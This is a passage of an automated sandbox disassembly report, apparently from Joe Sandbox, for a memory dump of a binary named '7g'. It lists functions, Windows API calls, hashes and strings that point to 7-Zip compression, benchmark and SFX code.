Opcode ID: b838fc036b3e97908aaaa1551be292f48d99c756d65e1e60f81a6ce78553bc12
Instruction ID: a02f1da5b8db1576c04c9fa6190e0f3cc87237d68caab61a8716cfdee719ead8
Opcode Fuzzy Hash: b838fc036b3e97908aaaa1551be292f48d99c756d65e1e60f81a6ce78553bc12
Instruction Fuzzy Hash: 06A011CCE2000022EA28A238380202320A322E0A0ABC8C8B8B8088002AFB28E0083022

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B403 Relevance: 1.3, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A2B40C

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 26e42e1769c6ed074f33df6d19aed3bb381e873a777d51b573143078cf27d105
Instruction ID: 31f04a2034bb0359affc84f13fe0ceaa9893c865dfe55e98d6704aa2c415edbb
Opcode Fuzzy Hash: 26e42e1769c6ed074f33df6d19aed3bb381e873a777d51b573143078cf27d105
Instruction Fuzzy Hash: B1A0017C68060066ED60AA606D4AF5A263467C1B11F2085447245690D05AA560559A18

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B2B0 Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT(?,009D18CF), ref: 00A2B2B1

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a90df977d088e559b5a3ac096065e4e608ea07d1065a4237869f9109acf530e5
Instruction ID: 2e99c785824c17aea38f47dcd7483e3b8392fbeebb42bdfe11407582e1e8cae6
Opcode Fuzzy Hash: a90df977d088e559b5a3ac096065e4e608ea07d1065a4237869f9109acf530e5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B370 Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00A2B371

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6556b2eae512d4ea31c455de01abe10921b699777217d18599bb46ef90935db4
Instruction ID: e671cacbe081437bbbe52304507a13ffccba77eede02c239cfce5929baae39fe
Opcode Fuzzy Hash: 6556b2eae512d4ea31c455de01abe10921b699777217d18599bb46ef90935db4
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 009D1E89 Relevance: 1.3, APIs: 1, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f581be0fda24b1a685a444628469b0fe898f4ca16cc39377eee4242c85ef8fb2
Instruction ID: c36a87616ad137c0343d14b5c6fd0d5c25b82193b9b9839ca25f51325bfe2ad0
Opcode Fuzzy Hash: f581be0fda24b1a685a444628469b0fe898f4ca16cc39377eee4242c85ef8fb2
Instruction Fuzzy Hash: C2A00279005101DBCE855B54ED0D4CB7B61EBC5623B204599F047404708B324971FA01

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009EAA45 Relevance: 90.0, APIs: 6, Strings: 44, Instructions: 2537COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EAA4A

Part of subcall function 009EDB91: __EH_prolog.LIBCMT ref: 009EDB96

Strings

tic, xrefs: 009EADE1
LZMA, xrefs: 009EB727, 009EBE44, 009EBFFF, 009EC99F
Dict, xrefs: 009EBA96
R/U, xrefs: 009EBAC6
KiB/s, xrefs: 009EBB3D
Speed, xrefs: 009EBAAD
hash, xrefs: 009EB85F
Method, xrefs: 009EBA8F
Avr:, xrefs: 009EC1C4
MB/s, xrefs: 009EC74F
file size =, xrefs: 009EAC72
Rating, xrefs: 009EBAD4
CPU, xrefs: 009EBBF2, 009EBDB4
MIPS, xrefs: 009EBB53, 009EBB61
THRD, xrefs: 009EC6C7
, xrefs: 009EAE97
timems, xrefs: 009EAD8E
size: , xrefs: 009EB64D
Effec, xrefs: 009EBAF5
Compressing, xrefs: 009EBA5A
crc32, xrefs: 009EB7CC
time, xrefs: 009EAD29
, xrefs: 009EC042
AES128, xrefs: 009EC8E1
CRC, xrefs: 009EB7BE
file, xrefs: 009EAC12
freq=, xrefs: 009EB031
mts, xrefs: 009EAEEF
E/U, xrefs: 009EBAE9
CPU hardware threads:, xrefs: 009EB657
AES192, xrefs: 009EC8FB
@, xrefs: 009EB1AF
T CPU Freq (MHz):, xrefs: 009EB4AD
(Cmplx), xrefs: 009EB3C0
Decompressing, xrefs: 009EBA75
*, xrefs: 009EBA42
Dictionary reduced to: , xrefs: 009EB98C
Avg:, xrefs: 009ECC06
freq, xrefs: 009EAFBA
Tot:, xrefs: 009EC22E
@, xrefs: 009EC981
, xrefs: 009EC6D2
Usage, xrefs: 009EBAB9, 009EC72F
Size, xrefs: 009EC6D9, 009EC6E0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: $ $ $ (Cmplx)$*$@$@$AES128$AES192$Avg:$Avr:$CPU$CPU hardware threads:$CRC$Compressing$Decompressing$Dict$Dictionary reduced to: $E/U$Effec$KiB/s$LZMA$MB/s$MIPS$Method$R/U$Rating$Size$Speed$T CPU Freq (MHz):$THRD$Tot:$Usage$crc32$file$file size =$freq$freq=$hash$mts$size: $tic$time$timems
API String ID: 3519838083-768847781
Opcode ID: 117122a11ffba8d380fe9f2a0d4f1a4207739fba087bb489af35bd74949e282e
Instruction ID: 131e40a049817ccaea4d92523df4f861ab70f6c08b283c786caca2b14bfa72df
Opcode Fuzzy Hash: 117122a11ffba8d380fe9f2a0d4f1a4207739fba087bb489af35bd74949e282e
Instruction Fuzzy Hash: 39339E71D00299DFDF26DFA5C885BEEBBB5AF84300F1080A9E449AB291DB705E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 009FE6A7 Relevance: 61.4, APIs: 15, Strings: 19, Instructions: 1923timelibraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009FE6AC

Part of subcall function 009D5549: __EH_prolog.LIBCMT ref: 009D554E

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Part of subcall function 009D6FC5: __EH_prolog.LIBCMT ref: 009D6FCA

_CxxThrowException.MSVCRT(?,00A502C0), ref: 009FE956
_CxxThrowException.MSVCRT(?,00A502C0), ref: 009FE9A4
GetProcAddress.KERNEL32(00000000,MAPISendMail), ref: 009FFB86

Part of subcall function 009FE3D5: __EH_prolog.LIBCMT ref: 009FE3DA

wcscmp.MSVCRT ref: 009FF0F1
_CxxThrowException.MSVCRT(?,00A549E0), ref: 009FF170
memset.MSVCRT ref: 009FFD9A
memset.MSVCRT ref: 009FFDD5
memset.MSVCRT ref: 009FFE10
CompareFileTime.KERNEL32(?,00000018,?,00000000,?,00000000), ref: 009FFFBD
CompareFileTime.KERNEL32(?,-00000008), ref: 009FFFD2

Part of subcall function 009FE1FE: __EH_prolog.LIBCMT ref: 009FE203

Part of subcall function 00A01B0E: __EH_prolog.LIBCMT ref: 00A01B13
Part of subcall function 00A01B0E: ctype.LIBCPMT ref: 00A01B37

Strings

MAPISendMailW, xrefs: 009FF8D0
cannot find specified SFX module, xrefs: 009FE851
Scanning error, xrefs: 009FEECB
The file already exists, xrefs: 009FF255
, xrefs: 00A00198
MAPISendMail, xrefs: 009FFB7E
Mapi32.dll, xrefs: 009FF7B4
There is some data block after the end of the archive, xrefs: 009FEBD9
rsfx, xrefs: 009FE780
cannot delete the file, xrefs: 009FF693
stdout, xrefs: 009FF34D
It is not allowed to include archive to itself, xrefs: 009FF130
cannot move the file, xrefs: 009FF70A
cannot load Mapi32.dll, xrefs: 009FF7D0
SFX file is not specified, xrefs: 009FE7B6
The file is read-only, xrefs: 009FEA1D
7-Zip cannot find MAPISendMail function, xrefs: 009FFB96
GetFullPathName error, xrefs: 009FFABA
There is a folder with the name of archive, xrefs: 009FE9DD

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrowmemset$CompareFileTime$AddressProcctypefreewcscmp
String ID: $7-Zip cannot find MAPISendMail function$GetFullPathName error$It is not allowed to include archive to itself$MAPISendMail$MAPISendMailW$Mapi32.dll$SFX file is not specified$Scanning error$The file already exists$The file is read-only$There is a folder with the name of archive$There is some data block after the end of the archive$cannot delete the file$cannot find specified SFX module$cannot load Mapi32.dll$cannot move the file$rsfx$stdout
API String ID: 2048656472-2848870995
Opcode ID: 1c1a2038684bdad80437df5eba2e13637ae5a14e9e940e9c6f4f3832bc36ce43
Instruction ID: d2619b47e552221e9e55ce58bb6ad9604d6564a21727919d2b151011bc1aaf92
Opcode Fuzzy Hash: 1c1a2038684bdad80437df5eba2e13637ae5a14e9e940e9c6f4f3832bc36ce43
Instruction Fuzzy Hash: 1103DE31C0028CEEDF21EFA4D955BECBBB4AF95300F1480AAE54567292DB745F89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A7BC Relevance: 56.2, APIs: 17, Strings: 15, Instructions: 209libraryloadertimeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00A4E058,?), ref: 00A0A7D2
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A09A69,00000000), ref: 00A0A7D9

Part of subcall function 009DA540: GetSystemTimeAsFileTime.KERNEL32(?,00A0A7F2,00000000,00000000,75C28E30), ref: 009DA541

memset.MSVCRT ref: 00A0A7FB
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000000,75C28E30), ref: 00A0A814
GetProcAddress.KERNEL32(00000000,K32GetProcessMemoryInfo), ref: 00A0A829
LoadLibraryW.KERNEL32(Psapi.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00A09A69,00000000), ref: 00A0A836
GetProcAddress.KERNEL32(00000000,GetProcessMemoryInfo), ref: 00A0A846
GetCurrentProcess.KERNEL32(?,00000028,?,?,?,?,?,?,?,?,?,?,?,?,?,00A09A69), ref: 00A0A854
GetProcAddress.KERNEL32(?,QueryProcessCycleTime), ref: 00A0A868
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A09A69,00000000), ref: 00A0A874
fputs.MSVCRT ref: 00A0A8F7
__aulldiv.LIBCMT ref: 00A0A90C
fputs.MSVCRT ref: 00A0A929
fputs.MSVCRT ref: 00A0A955
__aulldiv.LIBCMT ref: 00A0A965
__aulldiv.LIBCMT ref: 00A0A97D
fputs.MSVCRT ref: 00A0A99A

Strings

Process, xrefs: 00A0A9A7
Psapi.dll, xrefs: 00A0A831
User , xrefs: 00A0A936
MCycles, xrefs: 00A0A924
Global , xrefs: 00A0A9CB
Physical, xrefs: 00A0A9DB
Cnt:, xrefs: 00A0A8F2
K32GetProcessMemoryInfo, xrefs: 00A0A823
Freq (cnt/ptime):, xrefs: 00A0A950
MHz, xrefs: 00A0A995
Kernel , xrefs: 00A0A8C4
QueryProcessCycleTime, xrefs: 00A0A860
kernel32.dll, xrefs: 00A0A80C
GetProcessMemoryInfo, xrefs: 00A0A840
Virtual , xrefs: 00A0A9BA

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: Processfputs$AddressCurrentProc__aulldiv$Time$FileHandleLibraryLoadModuleSystemTimesmemset
String ID: Cnt:$ Freq (cnt/ptime):$ MCycles$ MHz$GetProcessMemoryInfo$Global $K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
API String ID: 4173168154-4201791934
Opcode ID: f500f3b290247bd0987c847b79498c1b9a2d6b255cd242a47818d9fd0f22e4c6
Instruction ID: cf9ed84ba17805ec66afa056706901c1096801c20d12bc1aba71b54049016dc3
Opcode Fuzzy Hash: f500f3b290247bd0987c847b79498c1b9a2d6b255cd242a47818d9fd0f22e4c6
Instruction Fuzzy Hash: 52614975A00218BFDF14DFE4ED8ADEFBBB9FB98300F10452AF505A7290DA7158418B61

Uniqueness

Uniqueness Score: -1.00%

Function 009ECDBD Relevance: 11.3, APIs: 7, Instructions: 760COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009ECDC2

Part of subcall function 009EDAEA: __EH_prolog.LIBCMT ref: 009EDAEF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 00d215207b26206cb76e77dc2e6dc99a50041d699db72c4617d837af49f92d86
Instruction ID: 38bcd808cbc09b328e3644f0a26273e79249ea0c13e3e31836c176102e70d919
Opcode Fuzzy Hash: 00d215207b26206cb76e77dc2e6dc99a50041d699db72c4617d837af49f92d86
Instruction Fuzzy Hash: 4C626871D0129ACFDF26DFA5C881BAEBBB5BF44304F1444AAE805AB281D7749E41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A1FB46 Relevance: 10.1, APIs: 3, Strings: 1, Instructions: 3058COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1FB4B
SysFreeString.OLEAUT32(?), ref: 00A2059F
SysFreeString.OLEAUT32(?), ref: 00A20664

Part of subcall function 009D1E55: malloc.MSVCRT ref: 009D1E68
Part of subcall function 009D1E55: _CxxThrowException.MSVCRT(?,00A50098), ref: 009D1E82

Part of subcall function 00A232B1: __EH_prolog.LIBCMT ref: 00A232B6

Strings

, xrefs: 00A22357

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: FreeH_prologString$ExceptionThrowmalloc
String ID:
API String ID: 4226697389-3916222277
Opcode ID: 9dfe96e3082345af8785b0735e112eefcbbd2c2bfade0255ff4c62fc4ef55811
Instruction ID: 5700e6d145e25c8e4658dfc2667d6baafd4722e95fe5c0f845853270534de576
Opcode Fuzzy Hash: 9dfe96e3082345af8785b0735e112eefcbbd2c2bfade0255ff4c62fc4ef55811
Instruction Fuzzy Hash: A2539A30D00268DFDF25DBA8D984BEDBBB5AF59304F1440E9E44AA7292DB749E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 009D8F71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetDiskFreeSpaceExW,7622F5D0,00000002,00000000,?,?,?,?,?,?,009D76EF,009D1B1A,009D785D,?,00000002), ref: 009D8F8D
GetProcAddress.KERNEL32(00000000), ref: 009D8F94
GetDiskFreeSpaceW.KERNEL32(00000002,?,009D785D,009D76EF,009D1B1A,?,?,?,?,?,?,009D76EF,009D1B1A,009D785D,?,00000002), ref: 009D8FE4

Strings

kernel32.dll, xrefs: 009D8F88
GetDiskFreeSpaceExW, xrefs: 009D8F7E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressDiskFreeHandleModuleProcSpace
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1197914913-1127948838
Opcode ID: 0d515a3e121b5e3e207b40211480827624eaad5a7d3693a0ff6f4e6f1d8184e3
Instruction ID: 580d55597de87240c13691d490a52e38c178c62a1d33ae77497d82f58c7d625a
Opcode Fuzzy Hash: 0d515a3e121b5e3e207b40211480827624eaad5a7d3693a0ff6f4e6f1d8184e3
Instruction Fuzzy Hash: 482126B5900209AFCB11DFA8C845EEFBBF8FF48300F10846AE555A7250E731A955CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A3D230 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00A0B131), ref: 00A3D230
GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00A3D246
GetProcAddress.KERNEL32(00000000), ref: 00A3D24D

Strings

SetDefaultDllDirectories, xrefs: 00A3D23C
kernel32.dll, xrefs: 00A3D241

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressHandleModuleProcVersion
String ID: SetDefaultDllDirectories$kernel32.dll
API String ID: 3310240892-2102062458
Opcode ID: cc448d7681d7092515ca645bab7733800c7b30bb7b831ab27365c570425b0da2
Instruction ID: 542fd53d864fc045166134d0127baf6cbfad046ecb32d941a1ebe53824e7b121
Opcode Fuzzy Hash: cc448d7681d7092515ca645bab7733800c7b30bb7b831ab27365c570425b0da2
Instruction Fuzzy Hash: 78C0123C640202FAD7009BF8AD0FF4726176FC5B03F504910B501D00D0CB66C423C626

Uniqueness

Uniqueness Score: -1.00%

Function 009D801A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D801F
GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 009D806E
DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 009D809B
memcpy.MSVCRT ref: 009D80BA

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
String ID:
API String ID: 1689166341-0
Opcode ID: 492e07b3258d6b065388ed7a76cb0414f3ec27eb798d63dc3cc548d475a34a7c
Instruction ID: 93f18eaf7552e39893aa898a46c02b1f00a7f5173640ae59875e6b654a3ba262
Opcode Fuzzy Hash: 492e07b3258d6b065388ed7a76cb0414f3ec27eb798d63dc3cc548d475a34a7c
Instruction Fuzzy Hash: 18217F76940204BFDF25DF94EC85AEFBBB9EBD5750F20812EF945A7291CA314E04CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00A19416 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 333COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1941B

Part of subcall function 00A1AB49: __EH_prolog.LIBCMT ref: 00A1AB4E

Strings

Copy, xrefs: 00A1948B
LZMA2, xrefs: 00A19462, 00A19492, 00A19497

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: Copy$LZMA2
API String ID: 3519838083-1006940721
Opcode ID: e529d2010f62ed3cfa300cd82181ee572d443099b52e22817d42184db6378d74
Instruction ID: 72b598824c8d8c5d725269403a3334f2cd32511fe7cc488e7feedeb90ce48856
Opcode Fuzzy Hash: e529d2010f62ed3cfa300cd82181ee572d443099b52e22817d42184db6378d74
Instruction Fuzzy Hash: ABD1BF71E002048FDF25DFA9C5A5BEFB7B2BF84310F18812AE456AB285C77498C5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009D947F Relevance: 4.7, APIs: 3, Instructions: 201timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(?,00000000,?,00000000,?,00000000,00A06C61,00000000,00A5A5B0,00000000,00000000), ref: 009D9494
FileTimeToSystemTime.KERNEL32(?,?), ref: 009D94A6
__aullrem.LIBCMT ref: 009D9608

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: Time$File$LocalSystem__aullrem
String ID:
API String ID: 2417234408-0
Opcode ID: a4585960fdacfd1942a180f1cd57a8a6ccfa8479e47b2a19d4b832f36822653e
Instruction ID: 2d8296304498c23444fc5b28710804e2e290a166d059e7bccc6aa8ae71da01c4
Opcode Fuzzy Hash: a4585960fdacfd1942a180f1cd57a8a6ccfa8479e47b2a19d4b832f36822653e
Instruction Fuzzy Hash: 2B51E871A043559BDB10CF5AC4C06EEFBE6EF79214F14C05EE88497242D27A899AC760

Uniqueness

Uniqueness Score: -1.00%

Function 009D71B5 Relevance: 4.6, APIs: 3, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D71BA
GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000050,?,00000000), ref: 009D71D7
GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,00000000), ref: 009D7205

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: DriveLogicalStrings$H_prologfree
String ID:
API String ID: 396970233-0
Opcode ID: dd3088e526b6849ec3312ce90814f63631b4c7513c691ca445bfd69661df6d06
Instruction ID: 3f04e5e2781483908062bb3faf8016d11cd0ba482b47de58c45d726301485a03
Opcode Fuzzy Hash: dd3088e526b6849ec3312ce90814f63631b4c7513c691ca445bfd69661df6d06
